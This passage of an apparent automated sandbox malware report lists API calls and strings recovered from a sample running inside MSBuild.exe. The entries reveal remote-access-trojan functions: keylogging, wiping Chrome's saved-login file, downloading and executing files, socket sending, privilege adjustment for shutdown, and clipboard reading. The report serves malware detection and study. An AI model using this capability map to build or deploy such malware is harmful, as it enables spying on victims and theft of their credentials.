                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                          • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                          • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                          • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                          APIs
                                          • _free.LIBCMT ref: 00449212
                                          • _free.LIBCMT ref: 00449236
                                          • _free.LIBCMT ref: 004493BD
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                          • _free.LIBCMT ref: 00449589
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                          • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                          • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                          • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                          APIs
                                            • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                            • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                            • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                            • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                            • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                          • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                          • API String ID: 1589313981-2876530381
                                          • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                          • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                          • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                          • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                          • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP$['E
                                          • API String ID: 2299586839-2532616801
                                          • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                          • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                          • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                          • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                          • GetLastError.KERNEL32 ref: 0040BA58
                                          Strings
                                          • [Chrome StoredLogins not found], xrefs: 0040BA72
                                          • UserProfile, xrefs: 0040BA1E
                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 2018770650-1062637481
                                          • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                          • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                          • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                          • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                          • GetLastError.KERNEL32 ref: 0041799D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                          • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                          • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                          • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00409258
                                            • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                          • FindClose.KERNEL32(00000000), ref: 004093C1
                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                            • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                          • FindClose.KERNEL32(00000000), ref: 004095B9
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                          • String ID:
                                          • API String ID: 2435342581-0
                                          • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                          • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                          • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                          • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID:
                                          • API String ID: 276877138-0
                                          • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                          • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                          • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                          • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                          • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                          • _wcschr.LIBVCRUNTIME ref: 00451E58
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                          • String ID: sJD
                                          • API String ID: 4212172061-3536923933
                                          • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                          • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                          • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                          • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                          APIs
                                            • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                            • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                            • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                          • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                          • ExitProcess.KERNEL32 ref: 0040F8CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 5.1.0 Pro$override$pth_unenc
                                          • API String ID: 2281282204-182549033
                                          • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                          • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                          • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                          • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                          APIs
                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                          • wsprintfW.USER32 ref: 0040B1F3
                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimewsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                          • API String ID: 1497725170-248792730
                                          • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                          • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                          • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                          • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                          APIs
                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                          • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                          • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                          • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                          • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                          • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                          • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040966A
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstH_prologNext
                                          • String ID:
                                          • API String ID: 1157919129-0
                                          • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                          • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                          • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                          • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00408811
                                          • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                          • String ID:
                                          • API String ID: 1771804793-0
                                          • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                          • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                          • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                          • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadExecuteFileShell
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                          • API String ID: 2825088817-2582742282
                                          • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                          • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                          • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                          • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID: XPG$XPG
                                          • API String ID: 4113138495-1962359302
                                          • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                          • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                          • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                          • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                          APIs
                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                            • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                            • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                            • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateInfoParametersSystemValue
                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 4127273184-3576401099
                                          • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                          • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                          • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                          • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: PkGNG
                                          • API String ID: 0-263838557
                                          • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                          • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                          • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                          • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                          • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                          • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                          • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                          • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                          • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                          • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                          APIs
                                          • OpenClipboard.USER32(00000000), ref: 0040B711
                                          • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                          • CloseClipboard.USER32 ref: 0040B725
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseDataOpen
                                          • String ID:
                                          • API String ID: 2058664381-0
                                          • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                          • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                          • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                          • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                          Strings
                                          Memory Dump Source
